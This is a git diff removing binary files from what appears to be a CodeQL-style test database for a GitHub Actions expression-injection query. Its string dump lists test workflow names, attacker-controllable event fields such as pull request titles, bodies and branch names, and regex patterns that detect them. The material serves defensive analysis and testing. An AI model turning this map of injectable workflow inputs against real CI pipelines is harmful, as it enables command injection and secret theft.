zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U iAV7cs0RjXF5FkK+009C72oNAZfB=C7fl5x_H>VE`i2?Qi diff --git a/db/db-yaml/default/pools/poolInfo b/db/db-yaml/default/pools/poolInfo deleted file mode 100644 index df3045a1ff5f4f01ad1cca4e97dbff096c69683a..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 32 acmZQz00Sl<$;iOKv<5;$1SjTkivs`;zX8+$ diff --git a/db/db-yaml/default/sourceLocationPrefix.rel b/db/db-yaml/default/sourceLocationPrefix.rel deleted file mode 100644 index fde1ac19d2b083530bcab4cb4fd2dcaa285234ab..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 4 LcmZQzU|3lW!zSrk$os%~sBO;^f z^{@6k&ubQk4`)ww^AgAPyqQ!+<^t4j=p&ftQRe(WeMgO;zM;OCePGC`7&3WYZ|0@K zjc2DUIFYlPL*@o(Pl(sFq=Iuv?=r`oI?D5I6>pQ||))Un8v6}{Q ziTa!UC^%P`+x0=s|nS^WPXh)f|s{PvvYinJ__f)tVZyAiSh`i|v{jhpp zX&s{QWra2DEJJF^7{@$Jhu65Pyt(qVc;jD4h6RCzk%L&fh@c!~O5)_>Z9 z2)!FQFXH))N(|0VRvXE#03N9Je^7TS+8gF`zt$hXD(4A>Yd>I&CblS#VbU-s3%Ij& zKt>SVM`h0t+>f45@$T+srDa#x^##qJnS8{K5q5Jszp-jiUp z;#)y&0S}^ff%D=mN;jtloIU@-y)MH`(mxWP^~ARSs`iGcJAM~FtqNL-eo#D(L{Egi zOFZR7YpHV7x>ubcK9x{eJgBv!9hEQPwSJt2riYgbTLfUL9_zwloihypUfFP+&KL8eR${U`(ruD ze;MYXfW7``Tg7*O(fHv;QP;o~M88Y_PH;k%mmh8-^S^liQX!v$Ylz>_-%^*Dzobs6 z{bcZ;!WDuWNL{C1U_M3J(*&?y?O5LQaSmUIy#o%X{Tg?{yC3fydVO`@K5g>BAHzN5 z!#_;MGQ}rn&PAo+j_&Zkh*m<~rR=_NF6=5%lBm6B;nK-GP^e?IOaOPxz zFDf{iiT?ft-$(JUFmKZaAH3M%YO^!Z;nKsIvxWMaIwP~;5|~dc&mh^Wsoofy)ynvr zQvIlvEcA%Q(wQ)xcX>yz2yb{x_S-u-@!1=#c9)1=i~c0FmMS4!a(XKH%^lQ^$lf;5 zOv@u=W93T;H^Z94^!Sn!#^U{~JXyrJN^yR>=XpzRgpTS>em=uJL-iuBjCeOPXBON{ z?RS7r!91R7C-<)eUkG^1SlOK~o%M((BUzt2dBxdUO%;o{{h(o@WEFEVUFSOW#%v0^ zzM#34+LXAy%>O73BNl)xAZROJslC^s{5?Z z_U8e|oE@vRX0I!Co;v4~@qxpYWU&!hs~z6tWu}J8J-5M+;~8xPPL6>4qt(#wHsx)D zbWzF8MH>Xy75uZ(T=<3a#+?{mR$O6s!I`r%KP&#@;CNJH>L<#a8{GdG{c6+{`YDaJ zT&St?=2_C;hhISMRJHOC_>P(_{K^7)D%n?*7f;^TO_85~cdOs|k<#YFzo;}Ng}{R$ zQ_L_j273L;nJZZvoy?@nX{nUdV)gE(%=0L7;ws+E$Ao_moKUdg|L=KPvKpw&>k8Za zcD&~jwHacT=mnVw~P$Pva zOpim|Q63$?5N{^xl8_m|Ex;4#L1z>~9HqBaxSm?-3Vxn@2P<94UYUS5Sx-Aa`vA{L zYmz=!-7ydD9(x_A9pH8Jg47zy?>q|mJM{rnEjG9zY%AE3|ZHOL2 zzQdSK2(whOCgJa^^6Ww}xPo?2eGNDnyCew$v$0_g)}x1Yl&RP$9l4b^Pm8~mQnguAAGo3{N2qNz%? diff --git a/db/db-yaml/default/strings/0/metadata/page-000000 b/db/db-yaml/default/strings/0/metadata/page-000000 deleted file mode 100644 index cb4291b6b3b65463c7b9660f099668c0cfc4fe35..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 16384 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 Bc#Z%7 diff --git a/db/db-yaml/default/strings/0/pageDump/page-000000000 b/db/db-yaml/default/strings/0/pageDump/page-000000000 deleted file mode 100644 index eec9231ab076..000000000000 --- a/db/db-yaml/default/strings/0/pageDump/page-000000000 +++ /dev/null @@ -1,2 +0,0 @@ -tag:yaml.org,2002:(.*)mapstrboolseqintworkflow_call\$\{\{\s*[A-Za-z0-9_\[\]\*\(\)\.\-]+\s*\}\}octo-org/source-repo/.github/workflows/workflow.yml*output.workflow-outputFooahmadnassri/action-changed-filesoutput.filesPR changed filesoutput.jsondorny/paths-filteroutput.changesfranzdiebold/github-env-vars-actionoutput.CI_PR_DESCRIPTIONPR bodyoutput.CI_PR_TITLEPR titlejitterbit/get-changed-filesoutput.alloutput.addedoutput.modifiedoutput.removedoutput.renamedoutput.added_modifiedoutput.deletedkhan/pull-request-comment-triggeroutput.comment_bodypull_request_commenttj-actions/branch-namesoutput.current_branchPR current branchoutput.head_ref_branchPR head branchoutput.ref_branchBranch tirggering workflow runtj-actions/changed-filesoutput.added_filesoutput.copied_filesoutput.deleted_filesoutput.modified_filesoutput.renamed_filesoutput.all_old_new_renamed_filesoutput.type_changed_files${{ steps.changed-files.outputs.all_changed_files }}${{ secrets.DYNAMOBOTTOKEN }}${{ github.event.issue.url }}${{ github.actor }}${{ env.template }}${{ env.acceptable_missing_info }}${{ secrets.GITHUB_TOKEN }}${{env.comment_intro}}${{env.close_issue_comment}}${{env.info_needed}}${{env.issue_label}}${{env.needs_more_info_comment}}${{env.specific_info}}${{env.analysis_response}}${{env.greetings_comment}}${{ env.issue_json_string }}${{ github.repository }}${{github.event.after}}${{ env.ISSUE_BODY_PARSED }}${{env.user_name}}${{env.auto_branch}}${{env.destination_branch}}${{env.pr_message}}${{ github.event.discussion.title }}${{ github.event.discussion.body }}${{ github.event.pages[1].title }}${{ github.event.pages[11].title }}${{ github.event.pages[0].page_name }}${{ github.event.pages[2222].page_name }}${{ toJSON(github.event.pages.*.title) }}${{ steps.trim-url.outputs.trimmed_url }}${{needs.job1.outputs.job_output}}${{ env.global_env }}${{ env.test }}${{ env.job_env }}${{ env.step_env }}\$\{\{\s*([A-Za-z0-9_\[\]\*\((\)\.\-]+)\s*\}\}${{ matrix.language }}${{steps.no-step.outputs.foo}}github.event.comment.bodyinputs.who-to-greet${{ github.event.pull_request.title }}${{ github.event.pull_request.body }}${{ github.event.pull_request.head.label }}${{ github.event.pull_request.head.repo.default_branch }}${{ github.event.pull_request.head.repo.description }}${{ github.event.pull_request.head.repo.homepage }}${{ github.event.pull_request.head.ref }}${{ github.event.review.body }}output.unmerged_filesoutput.unknown_filesoutput.all_changed_and_modified_filesoutput.all_changed_filesoutput.other_changed_filesoutput.all_modified_filesoutput.other_modified_filesoutput.other_deleted_filesoutput.modified_keysoutput.changed_keystj-actions/verify-changed-filesoutput.changed-filestzkhan/pr-update-actionoutput.headMatchxt0rted/slash-command-actionoutput.command-arguments${{ github.head_ref }}${{ github.event.commits[11].message }}${{ github.event.commits[11].author.email }}${{ github.event.commits[11].author.name }}${{ github.event.head_commit.author.email }}${{ github.event.head_commit.author.name }}${{ github.event.head_commit.committer.email }}${{ github.event.head_commit.committer.name }}${{ github.event.commits[11].committer.email }}${{ github.event.commits[11].committer.name }}${{steps.summary.outputs.value}}${{steps.summary.outputs.foo}}${{ steps.source.outputs.all_changed_files_count }}${{ github.event.workflow_run.display_title }}${{ github.event.workflow_run.head_commit.message }}${{ github.event.workflow_run.head_commit.author.email }}${{ github.event.workflow_run.head_commit.author.name }}${{ github.event.workflow_run.head_commit.committer.email }}${{ github.event.workflow_run.head_commit.committer.name }}${{ github.event.workflow_run.head_branch }}${{ github.event.workflow_run.head_repository.description }}github.event.issue.titleenv.ISSUE_TITLEsteps.remove_quotations.outputs.replacedsteps.changed-files.outputs.all_changed_filesgithub.event.issue.bodyenv.content_analysis_responsesecrets.DYNAMOBOTTOKENgithub.event.issue.urlgithub.actorenv.ISSUE_BODYenv.templateenv.acceptable_missing_infosecrets.GITHUB_TOKENenv.comment_introenv.close_issue_commentenv.info_neededenv.issue_labelenv.needs_more_info_commentenv.specific_infoenv.analysis_responseenv.greetings_commentsteps.remove_quotes.outputs.replacedgithub.event.issue.numberenv.issue_json_stringsecrets.DYNAMO_ISSUES_TOKENgithub.repositorygithub.event.aftergithub.event.commits[0].messageenv.ISSUE_BODY_PARSEDenv.user_nameenv.auto_branchenv.destination_branchenv.pr_messagegithub.event.discussion.titlegithub.event.discussion.bodygithub.event.pages[1].titlegithub.event.pages[11].titlegithub.event.pages[0].page_namegithub.event.pages[2222].page_nametoJSON(github.event.pages.*.title)steps.extract-url.outputs.initial_urlsteps.curl.outputs.redirected_urlsteps.trim-url.outputs.trimmed_urlsteps.step.outputs.valuesteps.source.outputs.all_changed_filesalways()needs.job1.outputs.job_outputenv.global_envenv.testenv.job_envenv.step_envsteps.set-matrix.outputs.all_changed_filesfromJSON(needs.create-matrix.outputs.matrix)matrix.languagegithub.event.head_commit.messagesteps.no-step.outputs.foogithub.event.pull_request.titlegithub.event.pull_request.bodygithub.event.pull_request.head.labelgithub.event.pull_request.head.repo.default_branchgithub.event.pull_request.head.repo.descriptiongithub.event.pull_request.head.repo.homepagegithub.event.pull_request.head.refgithub.event.review.bodygithub.head_refgithub.event.commits[11].messagegithub.event.commits[11].author.emailgithub.event.commits[11].author.namegithub.event.head_commit.author.emailgithub.event.head_commit.author.namegithub.event.head_commit.committer.emailgithub.event.head_commit.committer.namegithub.event.commits[11].committer.emailgithub.event.commits[11].committer.namesteps.summary.outputs.valuesteps.summary.outputs.foosteps.source.outputs.all_changed_files_countsteps.step2.outputs.teststeps.step0.outputs.valuesteps.step1.outputs.MSGgithub.event.workflow_run.display_titlegithub.event.workflow_run.head_commit.messagegithub.event.workflow_run.head_commit.author.emailgithub.event.workflow_run.head_commit.author.namegithub.event.workflow_run.head_commit.committer.emailgithub.event.workflow_run.head_commit.committer.namegithub.event.workflow_run.head_branchgithub.event.workflow_run.head_repository.descriptionmerge.*/(([^/]*?)(?:\.([^.]*))?)argus_case_study.ymlargus_case_studyymlchanged-files.ymlcomment_issue.ymlcomment_issuecomment_issue_newline.ymlcomment_issue_newlinecross1.ymlcross1cross2.ymlcross2cross3.ymlcross3discussion.ymldiscussion_comment.ymlgollum.ymlimage_link_generator.ymlimage_link_generatorinter-job.ymlinter-jobissues.yamlyamlmatrix.ymlno-flow1.ymlno-flow1no-flow2.ymlno-flow2pull_request_review.ymlpull_request_review_comment.ymlpull_request_target.ymlpush.ymlsimple1.ymlsimple2.ymlsimple2test.ymlworkflow_run.ymlaction.ymlaction([^/]+)/([^/@]+)@(.+)v2frabertreplace-string-action1.2v4tj-actionsv40github-scriptv3actions-ecosystemaction-regex-matchv2.5setup-dotnetv1.2mad9000actions-find-and-replace-string3([^/]+)/([^/]+)/([^@]+)@(.+)actions/checkoutfrabert/replace-string-actionactions/github-scriptactions-ecosystem/action-regex-matchactions/setup-dotnetmad9000/actions-find-and-replace-string\bgithub\s*\.\s*event\s*\.\s*commits\[[0-9]+\]\s*\.\s*author\s*\.\s*email\b\bgithub\s*\.\s*event\s*\.\s*commits\[[0-9]+\]\s*\.\s*author\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*commits\[[0-9]+\]\s*\.\s*committer\s*\.\s*email\b\bgithub\s*\.\s*event\s*\.\s*commits\[[0-9]+\]\s*\.\s*committer\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*commits\[[0-9]+\]\s*\.\s*message\b\bgithub\s*\.\s*event\s*\.\s*head_commit\s*\.\s*author\s*\.\s*email\b\bgithub\s*\.\s*event\s*\.\s*head_commit\s*\.\s*author\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*head_commit\s*\.\s*committer\s*\.\s*email\b\bgithub\s*\.\s*event\s*\.\s*head_commit\s*\.\s*committer\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*head_commit\s*\.\s*message\b\bgithub\s*\.\s*head_ref\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*body\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*title\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*head\s*\.\s*ref\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*head\s*\.\s*label\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*head\s*\.\s*repo\s*\.\s*homepage\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*head\s*\.\s*repo\s*\.\s*description\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*head\s*\.\s*repo\s*\.\s*default_branch\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_branch\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*display_title\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_commit\b\s*\.\s*message\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_repository\b\s*\.\s*description\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_commit\b\s*\.\s*author\b\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_commit\b\s*\.\s*author\b\s*\.\s*email\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_commit\b\s*\.\s*committer\b\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_commit\b\s*\.\s*committer\b\s*\.\s*email\bexit name: Issue Workflowexit name: CIexit on: issue_commentexit name: I ... edicterexit name: Cherry pickingexit on: discussionexit on: dis ... commentexit on: gollumexit name: I ... cessingexit on: pushexit on: issuesexit name: " ... nguage"exit on: pul ... _reviewexit on: pul ... commentexit on: pul ... _targetexit on:exit name: 'test'exit name: 'Hello World'enter name: Issue Workflowenter name: CIenter on: issue_commententer name: I ... edicterenter name: Cherry pickingenter on: discussionenter on: dis ... commententer on: gollumenter name: I ... cessingenter on: pushenter on: issuesenter name: " ... nguage"enter on: pul ... _reviewenter on: pul ... commententer on: pul ... _targetenter on:enter name: 'test'enter name: 'Hello World'exit name: Issue Workflow (normal)exit name: CI (normal)exit on: issue_comment (normal)exit name: I ... edicter (normal)exit name: Cherry picking (normal)exit on: discussion (normal)exit on: dis ... comment (normal)exit on: gollum (normal)exit name: I ... cessing (normal)exit on: push (normal)exit on: issues (normal)exit name: " ... nguage" (normal)exit on: pul ... _review (normal)exit on: pul ... comment (normal)exit on: pul ... _target (normal)exit on: (normal)exit name: 'test' (normal)exit name: 'Hello World' (normal)input testocto-org/sink-repo/.github/workflows/workflow.ymlinput.config-pathexpression-injectionconfig-path.github/workflows/argus_case_study.yml.github/workflows.github.github/workflows/changed-files.yml.github/workflows/comment_issue.yml.github/workflows/comment_issue_newline.yml.github/workflows/cross1.yml.github/workflows/cross2.yml.github/workflows/cross3.yml.github/workflows/discussion.yml.github/workflows/discussion_comment.yml.github/workflows/gollum.yml.github/workflows/image_link_generator.yml.github/workflows/inter-job.yml.github/workflows/issues.yaml.github/workflows/matrix.yml.github/workflows/no-flow1.yml.github/workflows/no-flow2.yml.github/workflows/pull_request_review.yml.github/workflows/pull_request_review_comment.yml.github/workflows/pull_request_target.yml.github/workflows/push.yml.github/workflows/simple1.yml.github/workflows/simple2.yml.github/workflows/test.yml.github/workflows/workflow_run.ymlaction1/action.ymlaction1action2/action.ymlaction2action.yaml\bsteps\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\btoJSON\(steps\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)fromJSON\(steps\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)\binputs\.([A-Za-z0-9_-]+)\b\bneeds\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\btoJSON\(needs\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)fromJSON\(needs\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)toJSON\(inputs\.([A-Za-z0-9_-]+)\)fromJSON\(inputs\.([A-Za-z0-9_-]+)\)\bgithub\.event\.inputs\.([A-Za-z0-9_-]+)\btoJSON\(github\.event\.inputs\.([A-Za-z0-9_-]+)\)fromJSON\(github\.event\.inputs\.([A-Za-z0-9_-]+)\)\bjobs\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\btoJSON\(jobs\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)fromJSON\(jobs\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)\bmatrix\.([A-Za-z0-9_-]+)\btoJSO